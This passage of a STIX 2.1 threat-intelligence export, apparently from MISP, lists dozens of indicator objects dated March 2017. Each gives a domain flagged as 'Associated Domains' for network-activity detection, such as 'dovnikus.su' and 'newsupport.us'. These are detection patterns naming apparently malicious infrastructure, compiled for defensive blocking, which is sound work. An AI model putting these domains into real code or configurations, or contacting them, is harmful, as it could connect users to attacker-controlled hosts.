"id": "indicator--58db6cce-e974-4398-974e-4aa7950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'businessolution.site']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cce-d820-4861-a896-4af5950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'cheturion.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6ccf-0374-4f54-9167-4fef950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'chipacom.net']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cd0-6000-4ce6-bb18-4ef8950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'cloneduring.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cd1-f660-4f4c-87b5-4a95950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'companysafa.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cd2-1290-41c2-9f87-4461950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'corpofname.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cd3-42d0-416f-8886-4ec1950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'datamining.press']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cd4-01d0-4468-bf8c-4076950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'dersteoyna.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cd4-32d4-4f01-be6c-454c950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'dovnikus.su']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cd5-0ca8-45e0-ab5c-49b0950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'efros.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cd6-fea0-4233-8097-44e1950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'flashclicks.info']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cd7-efa0-4b82-97bd-44e2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'forbusinessgo.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cd8-6888-4f4b-857d-4767950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'fortificar.net']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cd9-f0f0-4eb3-97c3-4b6f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'fracking.host']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cda-58b4-4d22-98bd-4fdf950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'gateoflife.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cda-adfc-4b21-b3b8-4848950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'gaz.rocks']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cdb-1b28-43af-9ae4-4a26950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'gedealer.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cdc-ddec-4474-b02b-47f5950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'globuspp.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cdd-1c78-429f-a532-4c98950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'grandvita.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cde-349c-4e2f-b8b9-4b7d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'greenlanterns.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cdf-8a84-42fa-9e87-4864950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'greenworldsun.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6ce0-e934-430a-8bd3-4764950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'guardomorph.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6ce0-d2b4-4d8d-9fb7-4bea950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'guwang.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6ce1-7b34-4c38-841d-4674950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'jobforreborn.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6ce2-fb1c-4ed5-b3e3-42e9950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'kokinatsu.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6ce3-4084-4d0a-aa59-4c6b950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'kukuzaki.me']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6ce4-e8d0-487f-9ebd-49a1950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'kupala.me']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6ce5-0a80-434d-a6ea-417c950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'lastsnow.link']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6ce5-c274-495f-9fac-4819950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'maradonianos.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6ce6-2598-42c1-bd93-44ec950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'mercurytod.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6ce7-ec68-42da-9209-468a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'muxa.club']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6ce8-6980-430c-a6c6-477e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'mycorpsafa.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6ce9-fe48-4ea3-9189-458d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'n-nalog78.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cea-7a08-4905-b596-4635950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'newsunconcept.in']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cea-e9f4-4a12-9040-4314950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'newsupport.us']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6ceb-5be4-44b6-a5e8-4eb1950d210f",
